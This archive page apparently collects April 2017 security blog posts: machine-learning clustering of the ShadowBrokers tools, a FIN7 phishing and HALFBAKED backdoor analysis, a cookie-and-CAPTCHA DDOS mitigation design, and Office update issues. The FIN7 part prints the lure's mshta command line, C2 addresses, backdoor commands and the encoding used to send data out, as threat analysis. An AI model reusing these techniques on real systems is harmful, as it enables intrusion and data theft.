Monthly Archives: April 2017

ShadowBrokers Leak: A Machine Learning Approach

During the past few weeks I have read a lot of great papers, blog posts and full magazine articles on the ShadowBrokers leak (free public repositories: here and here) released by the Shadow Brokers group. Many of them described the amazing power of such tools (which, by the way, are currently being used by attackers to exploit systems missing the MS17-010 patch), others walked through great reverse engineering adventures on some of the most used payloads, and others again described what is going to happen in the near future.

So you are probably wondering why I am writing on this much-discussed topic again. Well, I did not find anyone who had decided to extract features from these tools in order to correlate them with notorious payloads and malware. Following up on my previous blog post, Malware Training Sets: A machine learning dataset for everyone, I decided to "refill" my public GitHub repository with more analyses on that topic.

If you are not familiar with this leak, you probably want to know that the Equation Group (attributed to the NSA) built FuzzBunch, an exploitation framework similar to Metasploit. The framework uses several remote exploits for Windows such as EternalBlue, EternalRomance, EternalSynergy, etc., which call external payloads as well; one of the most famous, as of today, is DoublePulsar, mainly used in SMB and RDP exploits. The system works in a straightforward way by performing the following steps:

  • STEP 1: EternalBlue is launched from the platform with a configuration file (the XML in the image) and the target IP.

EternalBlue working

  • STEP 2: DoublePulsar and additional payloads. Once EternalBlue has successfully exploited Windows (in my case it was Windows 7 SP1), it installs DoublePulsar, which can be used much as a professional PenTester would use Meterpreter/Empire/Beacon backdoors.

DoublePulsar usage
  • STEP 3: DanderSpritz. A command and control manager used to manage multiple implants. It can act as a C&C listener or it can be used to connect directly to targets as well.

DanderSpritz


Following the same process described here (and shown in the following image), I generated a features file for each of the aforementioned Equation Group tools. The process involved detonating the files in multiple sandboxes, performing both dynamic and static analysis. The analysis results were translated into MIST format and later saved as JSON files for convenience.


In order to compare previously generated results (i.e. the notorious malware available here) with this last leak, and to figure out whether the Equation Group can also be credited with building known malware (included in the repository), you might decide to use one of the several Machine Learning frameworks available out there. WEKA (developed by the University of Waikato) is a classic data mining tool which implements several algorithms and compares them in order to find the best fit for the data set. Since I am looking for the "best" algorithm to apply production Machine Learning to such a dataset, I decided to go with WEKA: it implements several algorithms "ready to go" and performs automatic performance analyses in order to figure out which algorithm is "best in my case". However, WEKA needs a specific input format called ARFF (described here), while I have a JSON representation of the MIST files. I tried several times to import my MIST JSON files into WEKA, but with no luck. So I decided to write a quick and dirty conversion tool, really *not performant* and really *not usable in a production environment*, which converts the MIST (JSONized) format into the ARFF format. The following script does this job, assuming the MIST JSONized content is loaded into a MongoDB server. NOTE: the script is ugly and written just to make it work; no input checks, no variable checks, and a naive, trivial O(m·n²) loop.

From MIST to ARFF
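Since the original script is only shown as a screenshot above, here is a minimal sketch of the same idea in Python, assuming each MongoDB document carries a sample name, a label and a list of MIST instruction tokens. Collection and field names are illustrative assumptions, not taken from the original script.

# Minimal sketch of a MIST(JSON)-to-ARFF conversion. Assumes documents of the
# form {"name": ..., "label": ..., "mist": ["<token>", ...]} in MongoDB;
# field and collection names are illustrative.
from pymongo import MongoClient

client = MongoClient("mongodb://localhost:27017")
samples = list(client["malware"]["mist"].find())

# The global vocabulary of MIST tokens becomes the ARFF attribute list.
vocab = sorted({tok for s in samples for tok in s.get("mist", [])})
labels = sorted({s["label"] for s in samples})

with open("MK.arff", "w") as out:
    out.write("@RELATION mist\n\n")
    for tok in vocab:
        out.write(f"@ATTRIBUTE '{tok}' NUMERIC\n")
    out.write("@ATTRIBUTE class {" + ",".join(labels) + "}\n\n@DATA\n")
    for s in samples:
        counts = {}
        for tok in s.get("mist", []):
            counts[tok] = counts.get(tok, 0) + 1          # token frequency per sample
        row = [str(counts.get(tok, 0)) for tok in vocab]  # O(samples x vocabulary)
        out.write(",".join(row) + f",{s['label']}\n")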

The resulting file MK.arff is 1.2 GB of pure text, ready to be analyzed with WEKA or any other Machine Learning tool that understands the standard ARFF file format. The script is available here. I am not going to comment on or describe the result sets, since I do not want to reach "governmentally dangerous" conclusions in my public blog. If you have read this blog post up to here, you have all the processes, the right data and the desired tools to perform the analyses on your own. What follows are some short, inconclusive results with no associated comments.

TEST 1:
Algorithm: SimpleKMeans (k-means)
Number of clusters: 95 (We know it, since the data is classified)
Seed: 18 (just random choice)
Distance Function: EuclideanDistance, Normalized and Not inverted.

RESULTS (within-cluster sum of squared errors: 5.00):

K-Means results
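For readers who prefer to stay outside WEKA, TEST 1 can be approximated with open-source Python tooling. The following rough sketch (my own, not part of the original analysis) loads the generated ARFF file and runs k-means with the same k and seed; scikit-learn's KMeans is a stand-in for WEKA's SimpleKMeans, so the numbers will not match exactly.

# Approximate TEST 1 outside WEKA: k-means with k=95 on the generated ARFF.
from scipy.io import arff
import numpy as np
from sklearn.preprocessing import MinMaxScaler   # mimic WEKA's normalized Euclidean distance
from sklearn.cluster import KMeans

data, meta = arff.loadarff("MK.arff")
feature_names = meta.names()[:-1]                # last attribute is the class label
X = np.array([[row[name] for name in feature_names] for row in data], dtype=float)
X = MinMaxScaler().fit_transform(X)

km = KMeans(n_clusters=95, random_state=18, n_init=10).fit(X)
print("within-cluster sum of squared errors:", km.inertia_)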

TEST 2 :
Algorithm: Expectation Maximisation
Number of clusters: to be discovered
Seed: 0

RESULTS (few significant clusters detected):

Extracted Classes
TEST 3 :
Algorithm: Cobweb
Number of clusters: to be discovered
Seed: 42

RESULTS (again, few significant clusters were found):

Few descriptive clusters

As of today many analysts have done a great job studying the ShadowBrokers leak, but few of them (actually none so far, to my knowledge) have tried to cluster the result sets derived from dynamic execution of the leaked tools. In this post I followed my previous path, enlarging my public dataset and offering security researchers the data, procedures and tools to run their own analyses.

Book Review: Practical Packet Analysis: Using Wireshark to Solve Real-World Network Problems

The overall equation is pretty simple: If you want to understand network traffic, you really should install Wireshark. And, if you really want to use Wireshark effectively, you should consider this book. Already in its third edition, Practical Packet Analysis both explains how Wireshark works and provides expert guidance on how you can use the tool to solve real-world network problems.

Yes, there are other packet analyzers, but Wireshark is one of the best, works on Windows, Mac, and Linux, and is free and open source. And, yes, there are other books, but this one focuses both on understanding the tool and using it to address the kind of problems that you're likely to encounter.


FIN7 Evolution and the Phishing LNK

FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.

In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.

In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints, catering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process.

Infection Chain

While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object.

By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action.

Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents

The malicious LNK launches “mshta.exe” with the following arguments passed to it:

vbscript:Execute("On Error Resume Next:set w=GetObject(,""Word.Application""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")

The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2.

Figure 2: Textbox inside DOC

The combined script from Word textbox drops the following components:

\Users\[user_name]\Intel\58d2a83f7778d5.36783181.vbs
\Users\[user_name]\Intel\58d2a83f777942.26535794.ps1
\Users\[user_name]\Intel\58d2a83f777908.23270411.vbs

Also, the script creates a named scheduled task for persistence to launch “58d2a83f7778d5.36783181.vbs” every 25 minutes.
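A simple way to look for these artifacts on a suspect host (my own hedged triage sketch, not something from the FireEye report) is to check for the dropped scripts under the user's Intel folder and for a scheduled task referencing the launcher VBS:

# Hedged triage sketch for the dropper artifacts described above (Windows only).
import glob
import subprocess

hits = glob.glob(r"C:\Users\*\Intel\*.vbs") + glob.glob(r"C:\Users\*\Intel\*.ps1")
for path in hits:
    print("suspicious dropped file:", path)

# The report does not give the task name, so search the verbose task list
# for the launcher VBS file name instead.
tasks = subprocess.run(["schtasks", "/query", "/fo", "LIST", "/v"],
                       capture_output=True, text=True).stdout
if "58d2a83f7778d5.36783181.vbs" in tasks:
    print("scheduled task referencing the FIN7 launcher VBS found")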

VBScript #1

The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. This VBScript checks if the “58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.

PowerShell Script

“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager.

The shellcode retrieves an additional payload by connecting to the following C2 server using DNS:

aaa.stage.14919005.www1.proslr3[.]com

Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:

 [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com

VBScript #2

“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files:

\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777638.60220156.ini
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777688.78384945.ps1
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776b5.64953395.txt
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776e0.72726761.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777716.48248237.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777788.86541308.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\Foxconn.lnk

This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.

HALFBAKED Backdoor Variant

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. This version of HALFBAKED connects to the following C2 server:

hxxp://198[.]100.119.6:80/cd
hxxp://198[.]100.119.6:443/cd
hxxp://198[.]100.119.6:8080/cd

This version of HALFBAKED listens for the following commands from the C2 server:

  • info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries
  • processList: Sends a list of running processes
  • screenshot: Takes a screenshot of the victim machine (using 58d2a83f777688.78384945.ps1)
  • runvbs: Executes a VBScript
  • runexe: Executes an EXE file
  • runps1: Executes a PowerShell script
  • delete: Deletes the specified file
  • update: Updates the specified file

All communication between the backdoor and the attacker C2 is encoded using the following technique, represented in pseudo code:

Function send_data(data)
    random_string = custom_function_to_generate_random_string()
    encoded_data = URLEncode(SimpleEncrypt(data))
    post_data("POST", random_string & "=" & encoded_data,
              Hard_coded_c2_url, Create_Random_Url(class_id))
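As a purely illustrative translation of that pseudocode (not FIN7's actual code), the request body ends up being a random parameter name paired with an encrypted, URL-encoded blob. The cipher below is a placeholder single-byte XOR plus Base64, since the real SimpleEncrypt routine is not specified here, and nothing is sent over the network:

# Illustration only: what the pseudocode above produces as a POST body.
import base64, random, string
from urllib.parse import quote

def simple_encrypt(data: bytes) -> bytes:
    return base64.b64encode(bytes(b ^ 0x6b for b in data))   # placeholder cipher

def build_post_body(data: bytes) -> str:
    random_string = "".join(random.choices(string.ascii_lowercase, k=8))
    encoded_data = quote(simple_encrypt(data))
    return f"{random_string}={encoded_data}"                  # random parameter name = encoded blob

print(build_post_body(b"example beacon data"))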

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor. Click here for more information.

Persistence Mechanism

Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file.

Figure 3: FIN7 phishing lure persistence mechanisms

Examining Attacker Shortcut Files

In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment. These files can be parsed with lnk-parser to extract all contents. LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address.

For example, one of these FIN7 LNK files contained the following properties:

  • Version: 0
  • NetBIOS name: andy-pc
  • Droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • Birth droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Birth droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • MAC address: 08:00:27:3d:52:68
  • UUID timestamp: 03/21/2017 (12:12:28.500) [UTC]
  • UUID sequence number: 2861

From this LNK file, we can see not only what the shortcut launched within the string data, but that the attacker likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.
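Because the droid file identifier is a version-1 UUID, the MAC address, timestamp and sequence number listed above can be recovered directly with Python's uuid module; a quick sketch:

# Recover host artifacts from the version-1 UUID embedded in the LNK file.
import uuid
from datetime import datetime, timedelta

u = uuid.UUID("a6eea972-0e2f-11e7-8b2d-0800273d5268")

mac = ":".join(f"{(u.node >> s) & 0xff:02x}" for s in range(40, -8, -8))
# UUIDv1 time is counted in 100-ns intervals since 1582-10-15
ts = datetime(1582, 10, 15) + timedelta(microseconds=u.time / 10)

print(mac)          # 08:00:27:3d:52:68 -- the 08:00:27 OUI belongs to VirtualBox
print(ts)           # 2017-03-21 12:12:28.5 (UTC)
print(u.clock_seq)  # 2861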

Example Phishing Lures

  • Filename: Doc33.docx
  • MD5: 6a5a42ed234910121dbb7d1994ab5a5e
  • Filename: Mail.rtf
  • MD5: 1a9e113b2f3caa7a141a94c8bc187ea7

FIN7 April 2017 Community Protection Event

On April 12, in response to FIN7 actively targeting multiple clients, FireEye kicked off a Community Protection Event (CPE) – a coordinated effort by FireEye as a Service (FaaS), Mandiant, FireEye iSight Intelligence, and our product team – to secure all clients affected by this campaign.

Mitigating application layer (HTTP(S)) DDOS attacks

DDOS attacks seem to be the new norm on the Internet. Years ago only big websites and web applications got attacked, but nowadays rather small and medium companies or institutions get attacked as well. This makes it necessary for administrators of smaller sites to plan for the time they get attacked. This blog post shows you what you can do yourself and for what you need external help. As you'll see later, you can most likely only mitigate DDOS attacks against the application layer by yourself and need help for all other attacks. One important part of a successful defense against a DDOS attack, which I won't explain here in detail, is a good media strategy: e.g. if you can convince the media that the attack is no big deal, they may not report sensationally about it and make the attack appear bigger and more problematic than it was. A classic example is a DDOS against a website that shows only information and has no impact on day-to-day operations. But there are better blogs for this non-technical topic, so let's get into the technical part.

different DDOS attacks

From the point of view of an administrator of a small website or web application there are basically two types of attacks:

  • An attack that saturates your Internet connection or your provider's Internet connection (bandwidth and traffic attack)
  • Attacks against your website or web application itself (application attack)

saturation attacks

Let's take a closer look at the first type of attack. There are many different variations of these connection saturation attacks, but the differences do not really matter to the SME administrator: you can't do anything against them by yourself. Why? You can't do anything on your server because the good traffic can't reach it in the first place, as your Internet connection or a connection/router of your Internet Service Provider (ISP) is already saturated with attack traffic. The mitigation needs to take place on a system upstream of the saturated part. There are different methods to mitigate such attacks.

Depending on the type of website it is possible to use a Content Delivery Network (CDN). A CDN basically caches the data of your website in multiple geographically distributed locations. This way each location only gets attacked by a part of the attacking systems. This is a nice way to also guard against many application layer attacks, but it does not work (or not easily) if the content of your site is not the same for every client/user. E.g. an information website with some downloads and videos is easily changed to use a CDN, but an application like a webmail system or an accounting system will be hard to adapt and will not gain 100% protection even then. Another problem with CDNs is that you must protect each website separately; that's OK if you have only one big website that is the core of your business, but it becomes a problem if the attacker can choose from multiple sites/applications. A classic example is a company that protects its homepage with a CDN, while the attacker finds via Google the webmail of the company's Exchange server. Instead of attacking the CDN, he attacks the Internet connection in front of the webmail. The problem will now most likely be that the VPN site-2-site connections to the remote offices of the company are down and working with the central systems is not possible anymore for the employees in the remote locations.

So let's assume for the rest of the document that using a CDN is not possible or not feasible. In that case you need to talk to your ISPs. The following are possible mitigations a provider can deploy for you:

  • Using a dedicated DDOS mitigation tool. These tools take all traffic and filter most of the bad traffic out. For this to work the mitigation tool needs to know your normal traffic patterns, and the DDOS needs to be small enough that the Internet connections of the provider are able to handle it. Some companies sell on-premises mitigation tools; don't buy them, it's wasted money.
  • If the DDOS attack is against an IP address which is not mission critical (e.g. the attack is against the website, but the web application is the critical system), let the provider block all traffic to that IP address. If the provider has an agreement with its upstream providers it is even possible to filter that traffic before it reaches the provider, so this also works if the ISP's Internet connection cannot handle the attack.
  • If you have your own IP space it is possible for your provider(s) to stop announcing your IP addresses/subnet to every router in the world and e.g. only announce it to local providers. This helps to reduce the traffic to an amount which can be handled by a mitigation tool or by your Internet connection. This is an especially good mitigation method if your main audience is local, e.g. 90% of your customers/clients are from the same region or country as you are – during an attack you don't care about IP addresses from some foreign, far away country.
  • A special variant of the last point is to connect to a local Internet exchange, which may also help to reduce your Internet costs and in any case raises your resilience against DDOS attacks.

This covers the basics and allows you to understand and talk with your providers at eye level. There is also a subset of saturation attacks which saturates not the connection but the server or firewall (e.g. SYN floods), but as most small and medium companies will have at most a one Gbit Internet connection, it is unlikely that a decent server (and its operating system) or firewall is the limiting factor; most likely it's the application on top of it.

application layer attacks

Which is a perfect transition to this chapter about application layer DDOS. Let's start with an example to describe this kind of attack. Some years ago a common attack was to use the pingback feature of WordPress installations to flood a given URL with requests. I've seen such an attack that requested a special URL on a target system which did something CPU- and memory-intensive, and which led to a successful DDOS against the application with less than 10 Mbit/s of traffic. All requests were valid requests, and as the URL was an HTTPS one (which is more likely than not today), a mitigation in the network was not possible. The solution was quite easy in this case, as the HTTP User-Agent was WordPress, which was easy to filter on the web server and had no side effects.

But this was a specific mitigation which would be easy to bypass if the attacker noticed it and changed the requests his botnet sends. This also leads to the main problem with this kind of attack: you need to be able to block the bad traffic and let the good traffic through. Persistent attackers commonly change the attack mode – an attack is done with method 1 until you're able to filter it out, then the attacker changes to the next method. This can go on for days. To make it harder for an attacker it is a good idea to implement some kind of human vs. bot detection method.

I’m human

The “I’m human” button from Google is quite well known. The technique behind it is that it rates the connection (source IP address, cookies from login sessions to Google, …) and with that information it decides if the request is from a human or not. If the system is sure the request is from a human you won't see anything. In case it's slightly unsure, a simple green check-mark will be shown; if it's more unsure or thinks the request is from a bot, it will show a CAPTCHA. So the question is: can we implement something similar by ourselves? Sure we can, so let's dive into it.

peace time

During peace time, set a special DDOS cookie whenever a user authenticates correctly. I'll describe the data in the cookie later in detail.

war time

So let's say we detected an attack, manually or automatically, by checking the number of requests e.g. against the login page. In that case the bot/human detection gets activated. Now the web server checks for each request whether the DDOS cookie is present and whether it can be decoded correctly. All requests which don't contain a valid DDOS cookie get redirected temporarily to a separate host, e.g. https://iamhuman.example.org, with the originally requested URL passed along as the referrer. This host runs on a different server (so if it gets overloaded it does not affect the normal users). It shows a CAPTCHA, and if the user solves it correctly the DDOS cookie will be set for example.org and a redirect to the original URL will be sent.

Info: If you get requests from trusted IP ranges, e.g. internal IP addresses or IP ranges of partner organizations, you can exclude them from the redirect to the CAPTCHA page.

sophistication ideas and cookie

An attacker could obtain a cookie and use it for his bots. To guard against this, write the IP address of the client, encrypted, into the cookie. Also put the timestamp of the cookie's creation, encrypted, into it. Storing the username as well, if the cookie was created by the login process, is a good idea so you can check which user got compromised.

Encrypt the cookie with an authenticated encryption algorithm (e.g. AES-128-GCM) and put the following into it:

  • NONCE
  • typ
    • L for Login cookie
    • C for Captcha cookie
  • username
    • Only if login cookie
  • client IP address
  • timestamp

The key for the encryption/decryption of the cookie is static and does not leave the servers. The cookie should be set for the whole domain to be able to protect multiple websites/applications. Also make it HttpOnly to make stealing it harder.
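A minimal sketch of such a cookie, assuming AES-128-GCM from the Python "cryptography" package and a simple pipe-separated field layout (the exact serialization is my assumption, not part of the original design):

# Sketch of the DDOS cookie: AES-128-GCM over type|username|client IP|timestamp.
import os, time
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

KEY = os.urandom(16)      # in practice a static server-side key that never leaves the servers

def make_cookie(cookie_type: str, username: str, client_ip: str) -> str:
    plaintext = f"{cookie_type}|{username}|{client_ip}|{int(time.time())}".encode()
    nonce = os.urandom(12)
    return (nonce + AESGCM(KEY).encrypt(nonce, plaintext, None)).hex()

def check_cookie(cookie: str, client_ip: str, max_age: int = 30 * 86400) -> bool:
    try:
        raw = bytes.fromhex(cookie)
        data = AESGCM(KEY).decrypt(raw[:12], raw[12:], None).decode()
        _type, _user, ip, ts = data.split("|")
    except Exception:
        return False      # wrong key, tampered or malformed -> treat as "no cookie"
    return ip == client_ip and time.time() - int(ts) < max_age

c = make_cookie("L", "alice", "198.51.100.7")
print(check_cookie(c, "198.51.100.7"))   # True
print(check_cookie(c, "203.0.113.9"))    # False: cookie is bound to another client IP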

implementation

On the normal web server, which checks the cookie, the following implementations are possible:

  • The Apache web server provides the mod_session_* modules, which provide some of the needed functionality but not all of it
  • The Apache module RewriteMap (https://httpd.apache.org/docs/2.4/rewrite/rewritemap.html) with "prg: External Rewriting Program" should allow everything, though performance may be an issue (see the sketch after this list)
  • Your own Apache module
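For the RewriteMap option, the external program reads one lookup key per line from stdin and must answer with exactly one unbuffered line on stdout. A rough sketch of such a helper (wiring it to the cookie check described above is an assumption on my part):

#!/usr/bin/env python3
# RewriteMap "prg:" helper: Apache feeds one cookie value per line, we answer
# "ok" (valid DDOS cookie) or "deny" (redirect this request to the CAPTCHA host).
import sys

def check_cookie(value: str) -> bool:
    ...  # stub: decrypt and validate the DDOS cookie as in the sketch above

for line in sys.stdin:
    cookie = line.strip()
    sys.stdout.write("ok\n" if cookie and check_cookie(cookie) else "deny\n")
    sys.stdout.flush()    # RewriteMap programs must not buffer their output

In httpd.conf this would be hooked in with something like RewriteMap ddoscheck "prg:/usr/local/bin/ddos_check.py" plus a RewriteCond/RewriteRule pair that redirects to the CAPTCHA host whenever the map answers "deny".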

If you know about any other method, please write a comment!

The CAPTCHA issuing host is quite simple; a minimal sketch follows the list below.

  • Use any minimalistic website with PHP/Java/Python to create the cookie
  • Create your own CAPTCHA or integrate a solution like Recaptcha
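A minimal sketch of such a CAPTCHA host using Flask (the framework choice and helper names are mine, not from the post): verify the CAPTCHA answer, set the domain-wide DDOS cookie and send the visitor back to the originally requested URL.

# Sketch of the CAPTCHA issuing host (e.g. https://iamhuman.example.org).
from flask import Flask, request, redirect

app = Flask(__name__)

FORM = ('<form method="post">[CAPTCHA goes here]'
        '<input type="hidden" name="ref" value="{ref}">'
        '<input type="submit" value="I am human"></form>')

def captcha_is_valid(form) -> bool:
    return False          # stub: verify Recaptcha or your own CAPTCHA here

def make_cookie(cookie_type: str, username: str, client_ip: str) -> str:
    return ""             # stub: the AES-GCM cookie from the sketch above

@app.route("/", methods=["GET", "POST"])
def challenge():
    if request.method == "POST" and captcha_is_valid(request.form):
        resp = redirect(request.form.get("ref", "https://example.org/"))
        resp.set_cookie("ddos", make_cookie("C", "", request.remote_addr),
                        domain=".example.org", httponly=True, secure=True)
        return resp
    return FORM.format(ref=request.args.get("ref", "https://example.org/"))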

pro and cons

  • Pro
    • Users that authenticated within the last weeks won’t see the DDOS mitigation. Most likely these are your power users / biggest clients.
    • It’s possible to step up the protection gradually, e.g. the IP address binding is only needed when the attacker is using valid cookies.
    • The primary web server does not need any database or external system to check the cookie.
    • The most likely case during an attack is that the cookie is not set at all, which takes very few CPU resources to check.
    • Sending a 302 to the bot creates only a few bytes of traffic, and if the bot requests the redirected URL it hits the other server, so there is no load on the server we want to protect.
    • No change to the applications is necessary.
    • The operations team does not need to be expert in mitigating attacks against the application layer; simply activating the protection is enough.
    • Traffic stays local and is not sent to an external provider (which may be a problem for a bank or under data protection laws in Europe).
  • Cons
    • How to handle automated requests (APIs)? Make exceptions for these or block them in case of an attack?
    • Problems with non-browser clients such as ActiveSync clients.
    • Multiple domains need multiple cookies.

All in all I see this as a good mitigation method for application layer attacks, and I hope this blog post helps you and your business. Please leave feedback in the comments. Thx!

Mac attack

After years of enjoying relative security through obscurity, many attack vectors have recently proved successful on Apple Macs, opening the Mac up to future attack. A reflection of this is the final quarter of 2016, when Mac OS malware samples increased by 247% according to McAfee. Even though threats are still much lower than for …

Battery Backup PSA

One of the better things you can do to protect the money you spend on electronic devices is to have a good surge protector and battery backup. If you’re like me, you only buy the kind where you can disable the audible alarms. The problem with this is that now you might not get any warning if the battery goes bad.

In some cases you’ll have the battery backup connected to a computer via USB and receive notices that way.  But in other cases where the battery backup is protecting home entertainment equipment, your cable modem or your router, you might not know you have a problem until you happen to be home during a power hit.   Imagine how many times your equipment may have taken a hit that you didn’t know about.

The battery backup I just purchased says the battery is good for about three years. So put it on your calendar. If your battery backup has a visual indicator that it's broken, check that. And you may want to use the software that comes with the battery backup to connect to each unit and manually run a self-test (consult your own UPS manual about the best way to do that).

The post Battery Backup PSA appeared first on Roger's Information Security Blog.

The Twisty Maze of Getting Microsoft Office Updates

While investigating the fixes for the recent Microsoft Office OLE vulnerability, I encountered a situation that led me to believe that Office 2016 was not properly patched. However, after further investigation, I realized that the update process of Microsoft Update has changed. If you are not aware of these changes, you may end up with a Microsoft Office installation that is missing security updates. With the goal of preventing others from making similar mistakes as I have, I outline in this blog post how the way Microsoft Office receives updates has changed.

The Bad Old Days

Let's go back about 15 years in Windows computing to the year 2002. You've got a shiny new desktop with Windows XP and Office XP as well. If you knew where the option was in Windows, you could turn on Automatic Updates to download and notify you when OS updates are made available. What happens when there is a security update for Office? If you happened to know about the OfficeUpdate website, you could run an ActiveX control to check for Microsoft Office updates. Notice that the Auto Update link is HTTP instead of HTTPS. These were indeed dark times. But we had Clippy to help us through it!

officexp_clippy.png

Microsoft Update: A New Hope

Let's fast-forward to the year 2005. We now have Windows XP Service Pack 2, which enables a firewall by default. Windows XP SP2 also encourages you to enable Automatic Updates for the OS. But what about our friend Microsoft Office? As it turns out, an enhanced version of Windows Update, called Microsoft Update, was also released in 2005. The new Microsoft Update, instead of checking for updates for only the OS itself, now also checks for updates for other Microsoft software, such as Microsoft Office. If you enabled this optional feature, then updates for Microsoft Windows and Microsoft Office would be installed.

Microsoft Update in Modern Windows Systems

Enough about Windows XP, right? How does Microsoft Update factor into modern, supported Windows platforms? Microsoft Update is still supported through current Windows 10 platforms. But in each of these versions of Windows, Microsoft Update continues to be an optional component, as illustrated in the following screen shots for Windows 7, 8.1, and 10.

Windows 7

win7_windows_update.png

win7_microsoft_update.png

Once this dialog is accepted, we can now see that Microsoft Update has been installed. We will now receive updates for Microsoft Office through the usual update mechanisms for Windows.

win7_microsoft_update_installed.png

Windows 8.1

Windows 8.1 has Microsoft Update built-in; however, the option is not enabled by default.

win8_microsoft_update.png

Windows 10

Like Windows 8.1, Windows 10 also includes Microsoft Update, but it is not enabled by default.

win10_microsoft_update.png

Microsoft Click-to-Run

Microsoft Click-to-Run is a feature where users "... don't have to download or install updates. The Click-to-Run product seamlessly updates itself in the background." The Microsoft Office 2016 installation that I obtained through MSDN is apparently packaged in Click-to-Run format. How can I tell this? If you view the Account settings in Microsoft Office, a Click-to-Run installation looks like this:

office16_about.png

Additionally, you should notice a process called OfficeClickToRun.exe running:

procmon-ctr.png
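Both indicators can also be checked from a small script. The following is my own hedged sketch (the registry location is an assumption based on typical Click-to-Run installs, not something stated in this post):

# Quick Click-to-Run check (Windows only, standard library).
import subprocess
import winreg

tasklist = subprocess.run(["tasklist"], capture_output=True, text=True).stdout
print("OfficeClickToRun.exe running:", "OfficeClickToRun.exe" in tasklist)

try:
    winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Office\ClickToRun")
    print("Click-to-Run registry key present")
except FileNotFoundError:
    print("no Click-to-Run registry key found")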

Microsoft Office Click-to-Run and Updates

The interaction between a Click-to-Run version of Microsoft Office and Microsoft Updates is confusing. For the past dozen years or so, when a Windows machine completed running Microsoft Update, you could be pretty sure that Microsoft Office was up to date. As a CERT vulnerability analyst, my standard process on a Microsoft patch Tuesday was to restore my virtual machine snapshots, run Microsoft Update, and then consider that machine to have fully patched Microsoft software.

I first noticed a problem when my "fully patched" Office 2016 system still executed calc.exe when I opened my proof-of-concept exploit for CVE-2017-0199. Only after digging into the specific version of Office 2016 that was installed on my system did I realize that it did not have the April 2017 update installed, despite having completed Microsoft Update and rebooting. After setting up several VMs with Office 2016 installed, I was frequently presented with a screen like this:

office2016_no_updates_smaller.png

The problem here is obvious:

  • Microsoft Update is indicating that the machine is fully patched when it isn't.
  • The version of Office 2016 that is installed is from September 2015, which is outdated.
  • The above screenshot was taken on May 3, 2017, yet Microsoft Update was reporting that no updates were available when they actually were.

I would love to have determined why my machines were not automatically retrieving updates. But unfortunately there appear to be too many variables at play to pinpoint the issue. All I can conclude is that my Click-to-Run installations of Microsoft Office did not receive updates for Microsoft Office 2016 until as late as 2.5 weeks after the patches were released to the public. And in the case of the April 2017 updates, there was at least one vulnerability that was being exploited in the wild, with exploit code being publicly available. This amount of time is a long window of exposure.

It is worth noting that the manual update button within the Click-to-Run Office 2016 installation does correctly retrieve and install updates. The problem I see here is that it requires manual user interaction to be sure that your software is up to date. Microsoft has indicated to me that this behavior is by design:

[Click-to-Run] updates are pushed automatically through gradual rollouts to ensure the best product quality across the wide variety of devices and configurations that our customers have.

Personally, I wish that the update paths for Microsoft Office were more clearly documented.

